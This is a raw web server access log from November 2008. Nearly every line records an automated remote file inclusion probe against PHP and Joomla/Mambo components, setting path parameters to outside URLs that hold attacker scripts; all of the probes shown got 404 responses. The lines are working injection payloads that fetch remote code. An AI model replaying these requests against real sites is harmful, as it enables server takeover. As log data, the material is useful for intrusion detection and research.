66.55.139.190 - - [16/Nov/2008:19:02:25 -0800] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dinkesrl.net/.idc/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.redneckmba.com"
66.55.139.190 - - [16/Nov/2008:19:02:25 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dinkesrl.net/.idc/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.redneckmba.com"
66.55.139.190 - - [16/Nov/2008:19:02:25 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dinkesrl.net/.idc/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.redneckmba.com"
207.250.188.51 - - [16/Nov/2008:19:02:44 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://dcfcsite.org/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
207.250.188.51 - - [16/Nov/2008:19:02:44 -0800] "GET /logs/access.log%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://dcfcsite.org/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
77.221.130.15 - - [16/Nov/2008:19:04:05 -0800] "GET /logs/errors.php?error=http://www.automarket1.com//components/com_login/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
77.221.130.15 - - [16/Nov/2008:19:04:05 -0800] "GET /errors.php?error=http://www.automarket1.com//components/com_login/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
76.13.114.105 - - [16/Nov/2008:19:07:26 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 275 "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
84.21.71.133 - - [16/Nov/2008:19:07:41 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://paginas.terra.com.br/lazer/xum/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
222.122.52.79 - - [16/Nov/2008:19:07:54 -0800] "GET /PhpLinkExchange/bits_listings.php?svr_rootP=http://www.spikeblood.helloweb.eu/dati/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.redneckmba.com"
64.185.237.71 - - [16/Nov/2008:19:09:07 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://not-network.com/idscan8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "redneckmba.com"
64.185.237.71 - - [16/Nov/2008:19:09:07 -0800] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://not-network.com/idscan8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "redneckmba.com"
64.185.237.71 - - [16/Nov/2008:19:09:07 -0800] "GET /include/admin.lib.inc.php?site_path=http://not-network.com/idscan8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "redneckmba.com"
83.222.4.51 - - [16/Nov/2008:19:09:51 -0800] "GET /logs/errors.php?error=http://www.automarket1.com//components/com_login/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
83.222.4.51 - - [16/Nov/2008:19:09:52 -0800] "GET /errors.php?error=http://www.automarket1.com//components/com_login/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
84.21.71.133 - - [16/Nov/2008:19:09:56 -0800] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://paginas.terra.com.br/lazer/xum/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "redneckmba.com"
84.21.71.133 - - [16/Nov/2008:19:09:56 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://paginas.terra.com.br/lazer/xum/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "redneckmba.com"
84.21.71.133 - - [16/Nov/2008:19:09:56 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://paginas.terra.com.br/lazer/xum/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "redneckmba.com"
84.21.71.133 - - [16/Nov/2008:19:10:15 -0800] "GET /errors.php?error=http://paginas.terra.com.br/lazer/xum/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
64.185.237.71 - - [16/Nov/2008:19:12:15 -0800] "GET /include/admin.lib.inc.php?site_path=http://not-network.com/idscan8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.redneckmba.com"
64.185.237.71 - - [16/Nov/2008:19:12:15 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://not-network.com/idscan8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.redneckmba.com"
66.55.139.190 - - [16/Nov/2008:19:19:31 -0800] "GET /logs/access.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://dinkesrl.net/.idc/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.redneckmba.com"
66.55.139.190 - - [16/Nov/2008:19:19:31 -0800] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://dinkesrl.net/.idc/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.redneckmba.com"
66.55.139.190 - - [16/Nov/2008:19:19:31 -0800] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://dinkesrl.net/.idc/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.redneckmba.com"
66.55.139.190 - - [16/Nov/2008:19:20:31 -0800] "GET /logs/access.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://dinkesrl.net/.idc/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.redneckmba.com"
66.55.139.190 - - [16/Nov/2008:19:20:31 -0800] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://dinkesrl.net/.idc/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.redneckmba.com"
66.55.139.190 - - [16/Nov/2008:19:20:32 -0800] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://dinkesrl.net/.idc/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.redneckmba.com"
190.41.11.250 - - [16/Nov/2008:19:23:33 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
190.41.11.250 - - [16/Nov/2008:19:23:33 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
58.227.192.80 - - [16/Nov/2008:19:23:38 -0800] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.minart.org/bbs/data/a3.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
58.227.192.80 - - [16/Nov/2008:19:23:38 -0800] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.minart.org/bbs/data/a3.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
58.227.192.80 - - [16/Nov/2008:19:23:38 -0800] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.minart.org/bbs/data/a3.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
217.111.67.5 - - [16/Nov/2008:19:23:53 -0800] "GET /ashnews.php?pathtoashnews=http://www.dhammajak.net/guestbook/admin/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
217.111.67.5 - - [16/Nov/2008:19:23:53 -0800] "GET /logs/ashnews.php?pathtoashnews=http://www.dhammajak.net/guestbook/admin/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
217.111.67.5 - - [16/Nov/2008:19:23:53 -0800] "GET /logs/access.log/ashnews.php?pathtoashnews=http://www.dhammajak.net/guestbook/admin/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
130.206.76.41 - - [16/Nov/2008:19:23:58 -0800] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://dinkesrl.net/.idc/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
130.206.76.41 - - [16/Nov/2008:19:23:58 -0800] "GET /logs/access.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://dinkesrl.net/.idc/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
130.206.76.41 - - [16/Nov/2008:19:24:10 -0800] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://dinkesrl.net/.idc/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
203.114.112.155 - - [16/Nov/2008:19:25:29 -0800] "GET /logs/access.log/errors.php?error=http://www.spidergenie.com//config/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
203.114.112.155 - - [16/Nov/2008:19:25:30 -0800] "GET /errors.php?error=http://www.spidergenie.com//config/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
64.71.32.11 - - [16/Nov/2008:19:25:35 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.mascava.be/response.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "redneckmba.com"
64.71.32.11 - - [16/Nov/2008:19:25:35 -0800] "GET /logs/access.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.mascava.be/response.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "redneckmba.com"
64.71.32.11 - - [16/Nov/2008:19:25:35 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.mascava.be/response.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "redneckmba.com"
203.114.112.155 - - [16/Nov/2008:19:25:40 -0800] "GET /logs/errors.php?error=http://www.spidergenie.com//config/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
87.106.16.18 - - [16/Nov/2008:19:25:56 -0800] "GET /logs/ashnews.php?pathtoashnews=http://www.dhammajak.net/guestbook/admin/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "redneckmba.com"
87.106.16.18 - - [16/Nov/2008:19:25:57 -0800] "GET /logs/access.log/ashnews.php?pathtoashnews=http://www.dhammajak.net/guestbook/admin/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "redneckmba.com"
87.106.16.18 - - [16/Nov/2008:19:25:57 -0800] "GET /ashnews.php?pathtoashnews=http://www.dhammajak.net/guestbook/admin/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "redneckmba.com"
70.85.149.242 - - [16/Nov/2008:19:28:51 -0800] "GET /config/dbutil.bck.php?confdir=http://www.spikeblood.helloweb.eu/dati/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.redneckmba.com"
64.185.237.71 - - [16/Nov/2008:19:28:56 -0800] "GET /logs/access.log/errors.php?error=http://not-network.com/idscan8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "redneckmba.com"
64.185.237.71 - - [16/Nov/2008:19:28:56 -0800] "GET /errors.php?error=http://not-network.com/idscan8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "redneckmba.com"
64.185.237.71 - - [16/Nov/2008:19:28:56 -0800] "GET /logs/errors.php?error=http://not-network.com/idscan8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "redneckmba.com"
87.106.16.18 - - [16/Nov/2008:19:29:50 -0800] "GET /ashnews.php?pathtoashnews=http://www.dhammajak.net/guestbook/admin/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
87.106.16.18 - - [16/Nov/2008:19:29:50 -0800] "GET /logs/ashnews.php?pathtoashnews=http://www.dhammajak.net/guestbook/admin/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
69.13.34.162 - - [16/Nov/2008:19:30:07 -0800] "GET /admin/business_inc/saveserver.php?thisdir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
217.148.95.133 - - [16/Nov/2008:19:30:52 -0800] "GET /accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.goboyntonbeach.com/images/response??%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.redneckmba.com"
217.148.95.133 - - [16/Nov/2008:19:30:52 -0800] "GET /logs//accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.goboyntonbeach.com/images/response??%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.redneckmba.com"
72.29.68.244 - - [16/Nov/2008:19:32:29 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://yeonkok.puru.net/img/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.redneckmba.com"
72.29.68.244 - - [16/Nov/2008:19:32:29 -0800] "GET /admin/business_inc/saveserver.php?thisdir=http://yeonkok.puru.net/img/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.redneckmba.com"
213.170.44.18 - - [16/Nov/2008:19:32:40 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://luzumsuz.net/sili/response.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.redneckmba.com"
213.170.44.18 - - [16/Nov/2008:19:32:40 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://luzumsuz.net/sili/response.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.redneckmba.com"
64.185.237.71 - - [16/Nov/2008:19:32:45 -0800] "GET /errors.php?error=http://not-network.com/idscan8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.redneckmba.com"
69.89.31.108 - - [16/Nov/2008:19:33:06 -0800] "GET /logs/access.log/config.php?path_to_root=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.redneckmba.com"
69.89.31.108 - - [16/Nov/2008:19:33:06 -0800] "GET /config.php?path_to_root=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.redneckmba.com"
69.89.31.108 - - [16/Nov/2008:19:33:06 -0800] "GET /logs/config.php?path_to_root=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.redneckmba.com"
64.185.237.71 - - [16/Nov/2008:19:33:48 -0800] "GET /errors.php?error=http://not-network.com/idscan8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.redneckmba.com"
70.85.149.242 - - [16/Nov/2008:19:34:39 -0800] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.spikeblood.helloweb.eu/dati/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "redneckmba.com"
70.85.149.242 - - [16/Nov/2008:19:34:39 -0800] "GET /config/dbutil.bck.php?confdir=http://www.spikeblood.helloweb.eu/dati/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "redneckmba.com"
70.85.149.242 - - [16/Nov/2008:19:34:39 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://www.spikeblood.helloweb.eu/dati/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "redneckmba.com"
66.163.171.207 - - [16/Nov/2008:19:34:41 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 275 "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
85.93.165.132 - - [16/Nov/2008:19:35:33 -0800] "GET /logs/config.php?path_to_root=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
85.93.165.132 - - [16/Nov/2008:19:35:33 -0800] "GET /config.php?path_to_root=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
85.93.165.132 - - [16/Nov/2008:19:35:33 -0800] "GET /logs/access.log/config.php?path_to_root=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
69.89.31.108 - - [16/Nov/2008:19:35:45 -0800] "GET /config.php?path_to_root=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.redneckmba.com"
200.201.48.198 - - [16/Nov/2008:19:35:57 -0800] "GET /logs/access.log/config.php?path_to_root=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
200.201.48.198 - - [16/Nov/2008:19:35:57 -0800] "GET /config.php?path_to_root=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
200.201.48.198 - - [16/Nov/2008:19:35:57 -0800] "GET /logs/config.php?path_to_root=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
69.13.34.162 - - [16/Nov/2008:19:36:27 -0800] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
69.13.34.162 - - [16/Nov/2008:19:36:27 -0800] "GET /admin/business_inc/saveserver.php?thisdir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
69.13.34.162 - - [16/Nov/2008:19:36:27 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
58.147.23.170 - - [16/Nov/2008:19:36:41 -0800] "GET /logs/access.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.makenzielynnphotography.com/response.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "redneckmba.com"
58.147.23.170 - - [16/Nov/2008:19:36:41 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.makenzielynnphotography.com/response.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "redneckmba.com"
58.147.23.170 - - [16/Nov/2008:19:36:41 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.makenzielynnphotography.com/response.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "redneckmba.com"
89.186.1.54 - - [16/Nov/2008:19:37:40 -0800] "GET /logs/errors.php?error=http://www.spidergenie.com//config/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.redneckmba.com"
89.186.1.54 - - [16/Nov/2008:19:37:40 -0800] "GET /errors.php?error=http://www.spidergenie.com//config/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.redneckmba.com"
207.57.2.157 - - [16/Nov/2008:19:38:32 -0800] "GET /logs/access.log/config.php?path_to_root=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.redneckmba.com"
207.57.2.157 - - [16/Nov/2008:19:38:32 -0800] "GET /config.php?path_to_root=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.redneckmba.com"
207.57.2.157 - - [16/Nov/2008:19:38:32 -0800] "GET /logs/config.php?path_to_root=http://62.141.54.164/.file/ghx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.redneckmba.com"
209.85.238.3 - - [16/Nov/2008:19:40:25 -0800] "GET /blog/ HTTP/1.1" 404 275 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 1 subscribers; feed-id=2093614446390835355)" "www.redneckmba.com"
64.185.237.71 - - [16/Nov/2008:19:41:34 -0800] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://not-network.com/idscan8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "redneckmba.com"
64.185.237.71 - - [16/Nov/2008:19:41:34 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://not-network.com/idscan8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "redneckmba.com"
64.185.237.71 - - [16/Nov/2008:19:41:34 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://not-network.com/idscan8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "redneckmba.com"
69.13.34.162 - - [16/Nov/2008:19:41:35 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
69.13.34.162 - - [16/Nov/2008:19:41:35 -0800] "GET /admin/business_inc/saveserver.php?thisdir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
210.219.173.249 - - [16/Nov/2008:19:42:18 -0800] "GET /logs/access.log%20%20//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.dcfcsite.org/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
210.219.173.249 - - [16/Nov/2008:19:42:18 -0800] "GET /logs//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.dcfcsite.org/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
210.219.173.249 - - [16/Nov/2008:19:42:21 -0800] "GET /logs//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.dcfcsite.org/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
210.219.173.249 - - [16/Nov/2008:19:42:21 -0800] "GET /logs/access.log%20%20//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.dcfcsite.org/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
210.219.173.249 - - [16/Nov/2008:19:42:35 -0800] "GET /logs//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.dcfcsite.org/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
210.219.173.249 - - [16/Nov/2008:19:42:35 -0800] "GET /logs/access.log%20%20//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.dcfcsite.org/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
207.250.188.51 - - [16/Nov/2008:19:43:14 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://dcfcsite.org/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
207.250.188.51 - - [16/Nov/2008:19:43:14 -0800] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://dcfcsite.org/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
64.185.237.71 - - [16/Nov/2008:19:44:22 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://not-network.com/idscan8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.redneckmba.com"
203.146.251.182 - - [16/Nov/2008:19:44:28 -0800] "GET /theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://odj.or.id/images/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "redneckmba.com"
201.30.20.130 - - [16/Nov/2008:19:44:53 -0800] "GET /theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
201.30.20.130 - - [16/Nov/2008:19:44:53 -0800] "GET /logs/access.log%20%20//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
201.30.20.130 - - [16/Nov/2008:19:44:53 -0800] "GET /logs//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
64.185.237.71 - - [16/Nov/2008:19:45:14 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://not-network.com/idscan8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.redneckmba.com"
64.185.237.71 - - [16/Nov/2008:19:45:49 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://not-network.com/idscan8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.redneckmba.com"
69.64.70.75 - - [16/Nov/2008:19:47:09 -0800] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.cannabiswork.com/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "redneckmba.com"
69.64.70.75 - - [16/Nov/2008:19:47:09 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.cannabiswork.com/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "redneckmba.com"
69.64.70.75 - - [16/Nov/2008:19:47:09 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.cannabiswork.com/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "redneckmba.com"
222.122.52.79 - - [16/Nov/2008:19:47:50 -0800] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.spikeblood.helloweb.eu/dati/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.redneckmba.com"
222.122.52.79 - - [16/Nov/2008:19:47:51 -0800] "GET /PhpLinkExchange/bits_listings.php?svr_rootP=http://www.spikeblood.helloweb.eu/dati/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.redneckmba.com"
222.122.52.79 - - [16/Nov/2008:19:47:52 -0800] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.spikeblood.helloweb.eu/dati/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.redneckmba.com"
64.185.237.71 - - [16/Nov/2008:19:48:57 -0800] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://not-network.com/idscan8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "redneckmba.com"
64.185.237.71 - - [16/Nov/2008:19:48:57 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://not-network.com/idscan8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "redneckmba.com"
64.185.237.71 - - [16/Nov/2008:19:48:57 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://not-network.com/idscan8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "redneckmba.com"
64.185.237.71 - - [16/Nov/2008:19:51:58 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://not-network.com/idscan8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.redneckmba.com"
64.185.237.71 - - [16/Nov/2008:19:51:58 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://not-network.com/idscan8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.redneckmba.com"
195.12.53.176 - - [16/Nov/2008:19:52:07 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.geocities.com/arifferoza/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "redneckmba.com"
195.12.53.176 - - [16/Nov/2008:19:52:07 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.geocities.com/arifferoza/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "redneckmba.com"
